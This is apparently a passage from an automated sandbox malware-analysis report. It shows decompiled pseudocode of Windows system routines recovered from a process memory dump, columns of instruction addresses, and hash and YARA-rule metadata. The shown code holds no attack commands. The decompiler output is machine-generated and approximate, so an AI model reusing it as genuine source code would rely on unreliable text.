										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04B645F8))) {
												case 0:
													_v568 = 0x4b21078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4b211c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04B64620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04B8F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04B8F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04B452A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04B5EB70(1, 0x4c379a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04B5AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04B895D0();
																			L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E04B8B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04B83D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04B8B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                    0x04b64128
                                                    0x04b64135
                                                    0x04b6413c
                                                    0x04b64141
                                                    0x04b64145
                                                    0x04b64147
                                                    0x04b6414e
                                                    0x04b64151
                                                    0x04b64159
                                                    0x04b6415c
                                                    0x04b64160
                                                    0x04b64164
                                                    0x04b64168
                                                    0x04b6416c
                                                    0x04b6417f
                                                    0x04b64181
                                                    0x04b6446a
                                                    0x04b6446a
                                                    0x04b6418c
                                                    0x04b64195
                                                    0x04b64199
                                                    0x04b64432
                                                    0x04b64439
                                                    0x04b6443d
                                                    0x04b64442
                                                    0x04b64447
                                                    0x00000000
                                                    0x04b6419f
                                                    0x04b641a3
                                                    0x04b641b1
                                                    0x04b641b9
                                                    0x04b641bd
                                                    0x04b645db
                                                    0x04b645db
                                                    0x00000000
                                                    0x04b641c3
                                                    0x04b641c3
                                                    0x04b641ce
                                                    0x04b641d4
                                                    0x04bae138
                                                    0x04bae13e
                                                    0x04bae169
                                                    0x04bae16d
                                                    0x04bae19e
                                                    0x04bae16f
                                                    0x04bae16f
                                                    0x04bae175
                                                    0x04bae179
                                                    0x04bae18f
                                                    0x04bae193
                                                    0x00000000
                                                    0x04bae199
                                                    0x00000000
                                                    0x04bae199
                                                    0x04bae193
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b641da
                                                    0x04b641da
                                                    0x04b641df
                                                    0x04b641e4
                                                    0x04b641ec
                                                    0x04b64203
                                                    0x04b64207
                                                    0x04bae1fd
                                                    0x04b64222
                                                    0x04b64226
                                                    0x04bae1f3
                                                    0x04bae1f3
                                                    0x04b6422c
                                                    0x04b6422c
                                                    0x04b64233
                                                    0x04bae1ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b64239
                                                    0x04b64239
                                                    0x04b64239
                                                    0x04b64239
                                                    0x04b64233
                                                    0x04b64226
                                                    0x04b641ee
                                                    0x04b641ee
                                                    0x04b641f4
                                                    0x04b64575
                                                    0x04bae1b1
                                                    0x04bae1b1
                                                    0x00000000
                                                    0x04b6457b
                                                    0x04b6457b
                                                    0x04b64582
                                                    0x04bae1ab
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b64588
                                                    0x04b64588
                                                    0x04b6458c
                                                    0x04bae1c4
                                                    0x04bae1c4
                                                    0x00000000
                                                    0x04b64592
                                                    0x04b64592
                                                    0x04b64599
                                                    0x04bae1be
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b6459f
                                                    0x04b6459f
                                                    0x04b645a3
                                                    0x04bae1d7
                                                    0x04bae1e4
                                                    0x00000000
                                                    0x04b645a9
                                                    0x04b645a9
                                                    0x04b645b0
                                                    0x04bae1d1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b645b6
                                                    0x04b645b6
                                                    0x04b645b6
                                                    0x00000000
                                                    0x04b645b6
                                                    0x04b645b0
                                                    0x04b645a3
                                                    0x04b64599
                                                    0x04b6458c
                                                    0x04b64582
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b641f4
                                                    0x04b6423e
                                                    0x04b64241
                                                    0x04b645c0
                                                    0x04b645c4
                                                    0x00000000
                                                    0x04b645ca
                                                    0x04b645ca
                                                    0x00000000
                                                    0x04bae207
                                                    0x04bae20f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b645d1
                                                    0x00000000
                                                    0x00000000
                                                    0x04b645ca
                                                    0x00000000
                                                    0x04b64247
                                                    0x04b64247
                                                    0x04b64247
                                                    0x04b64249
                                                    0x04b64249
                                                    0x04b64249
                                                    0x04b64251
                                                    0x04b64251
                                                    0x04b64257
                                                    0x04b6425f
                                                    0x04b6426e
                                                    0x04b64270
                                                    0x04b6427a
                                                    0x04bae219
                                                    0x04bae219
                                                    0x04b64280
                                                    0x04b64282
                                                    0x04b64456
                                                    0x04b645ea
                                                    0x00000000
                                                    0x04b645f0
                                                    0x04bae223
                                                    0x00000000
                                                    0x04bae223
                                                    0x04b6445c
                                                    0x04b6445c
                                                    0x00000000
                                                    0x04b6445c
                                                    0x00000000
                                                    0x04b64288
                                                    0x04b6428c
                                                    0x04bae298
                                                    0x04b64292
                                                    0x04b64292
                                                    0x04b6429e
                                                    0x04b642a3
                                                    0x04b642a7
                                                    0x04b642ac
                                                    0x04bae22d
                                                    0x04b642b2
                                                    0x04b642b2
                                                    0x04b642b9
                                                    0x04b642bc
                                                    0x04b642c2
                                                    0x04b642ca
                                                    0x04b642cd
                                                    0x04b642cd
                                                    0x04b642d4
                                                    0x04b6433f
                                                    0x04b6433f
                                                    0x04b642d6
                                                    0x04b642d6
                                                    0x04b642d9
                                                    0x04b642dd
                                                    0x04b642eb
                                                    0x04bae23a
                                                    0x04b642f1
                                                    0x04b64305
                                                    0x04b6430d
                                                    0x04b64315
                                                    0x04b64318
                                                    0x04b6431f
                                                    0x04b64322
                                                    0x04b6432e
                                                    0x04b6433b
                                                    0x04b6433b
                                                    0x00000000
                                                    0x04b6432e
                                                    0x04b642eb
                                                    0x04b6434c
                                                    0x04b6434e
                                                    0x04b64352
                                                    0x04b64359
                                                    0x04b6435e
                                                    0x04b64361
                                                    0x04b6436e
                                                    0x04b6438a
                                                    0x04b6438e
                                                    0x04b64396
                                                    0x04b6439e
                                                    0x04b643a1
                                                    0x04b643ad
                                                    0x04b643bb
                                                    0x04b643bb
                                                    0x04b643ad
                                                    0x04b6436e
                                                    0x04b643bf
                                                    0x04b643c5
                                                    0x04b64463
                                                    0x04b64463
                                                    0x04b643ce
                                                    0x04b643d5
                                                    0x04b643d9
                                                    0x04b643df
                                                    0x04b64475
                                                    0x04b64479
                                                    0x04b64491
                                                    0x04b64491
                                                    0x04b64479
                                                    0x04b643e5
                                                    0x04b643eb
                                                    0x04b643f4
                                                    0x04b643f6
                                                    0x04b643f9
                                                    0x04b643fc
                                                    0x04b643ff
                                                    0x04b644e8
                                                    0x04b644ed
                                                    0x04b644f3
                                                    0x04bae247
                                                    0x00000000
                                                    0x04b644f9
                                                    0x04b64504
                                                    0x04b64508
                                                    0x04b6450f
                                                    0x04bae269
                                                    0x00000000
                                                    0x04b64515
                                                    0x04b64519
                                                    0x04b64531
                                                    0x04b64534
                                                    0x04b64537
                                                    0x04b6453e
                                                    0x04b64541
                                                    0x04b6454a
                                                    0x04bae255
                                                    0x04bae255
                                                    0x04bae25b
                                                    0x04bae25e
                                                    0x04bae261
                                                    0x04bae261
                                                    0x04b64555
                                                    0x04b64559
                                                    0x04b6455d
                                                    0x04bae26d
                                                    0x04bae270
                                                    0x04bae274
                                                    0x04bae27a
                                                    0x04bae27d
                                                    0x04bae28e
                                                    0x04bae28e
                                                    0x04b64563
                                                    0x04b64563
                                                    0x04b64569
                                                    0x04b64569
                                                    0x00000000
                                                    0x04b6455d
                                                    0x04b6450f
                                                    0x00000000
                                                    0x04b644f3
                                                    0x04b643ff
                                                    0x04b64405
                                                    0x04b64405
                                                    0x04b64405
                                                    0x04b642ac
                                                    0x04b6428c
                                                    0x04b64282
                                                    0x04b64407
                                                    0x04b6440d
                                                    0x04bae2af
                                                    0x04bae2af
                                                    0x04b64413
                                                    0x04b64413
                                                    0x00000000
                                                    0x04b641d4
                                                    0x00000000
                                                    0x04b641c3
                                                    0x04b641bd
                                                    0x04b64415
                                                    0x04b64415
                                                    0x04b64416
                                                    0x04b64417
                                                    0x04b64429
                                                    0x04b6416e
                                                    0x04b6416e
                                                    0x04b64175
                                                    0x04b64498
                                                    0x04b6449f
                                                    0x04bae12d
                                                    0x00000000
                                                    0x04bae133
                                                    0x00000000
                                                    0x04bae133
                                                    0x04b644a5
                                                    0x04b644a5
                                                    0x04b644aa
                                                    0x00000000
                                                    0x04b644bb
                                                    0x04b644ca
                                                    0x04b644d6
                                                    0x04b644d7
                                                    0x04b644d8
                                                    0x04b644e3
                                                    0x04b644e3
                                                    0x04b644aa
                                                    0x04b6417b
                                                    0x04b6417b
                                                    0x04b6417b
                                                    0x00000000
                                                    0x04b6417b
                                                    0x04b64175
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b50420d59a4e0638d4ff9491b6be1615557a4e110a31d15490d9d86b77ad201
                                                    • Instruction ID: 0404a20ae55493d4adff61c31bc0b32aa024c10d206b3c679c2146877872aa74
                                                    • Opcode Fuzzy Hash: 9b50420d59a4e0638d4ff9491b6be1615557a4e110a31d15490d9d86b77ad201
                                                    • Instruction Fuzzy Hash: 95F182706087118FDB24DF19C480A3AB7E1FF88718F1449AEF886CB250E738E995DB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B720A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E04B720A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x4c38714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04B72EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04B72EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E04B458EC(_t240);
									_t221 =  *0x4c35cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x4c35cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04B84A2C(0x4c36e40, 0x4b84b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04B67D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x4b25c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E04B7F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E04B7F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04BC7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04B62400(_t267 + 0x20);
															}
															L04B62400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04B72397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04B62280(_t134, 0x4c38608);
									__eflags =  *0x4c36e48 - _t253; // 0xc97390
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E04B5FFB0(_t198, _t241, 0x4c38608);
										__eflags = _t253;
										if(_t253 != 0) {
											L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x4c36e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x4c38608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04B76B90(_t210,  &_v64);
										_t262 =  *0x4c38608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E04B7E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E04B897C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E04B8006A(0x4c38608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x4c38608);
												E04B8B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x4c36904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x4c36e48; // 0xc97390
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E04B5FFB0(_t198, _t240, 0x4c38608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E04B800C2(0x4c38608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                    0x04b720a0
                                                    0x04b720a8
                                                    0x04b720ad
                                                    0x04b720b3
                                                    0x04b720b8
                                                    0x04b720c2
                                                    0x04b720c7
                                                    0x04b720cb
                                                    0x04b720d2
                                                    0x04b72263
                                                    0x04b72266
                                                    0x04bb5836
                                                    0x04bb5836
                                                    0x00000000
                                                    0x04b7226c
                                                    0x04b7226c
                                                    0x04b72270
                                                    0x04b72274
                                                    0x04b720e2
                                                    0x04b720e2
                                                    0x04b720e6
                                                    0x04b720ee
                                                    0x04bb57dc
                                                    0x04bb57de
                                                    0x04bb57ec
                                                    0x04bb57ec
                                                    0x04bb57f1
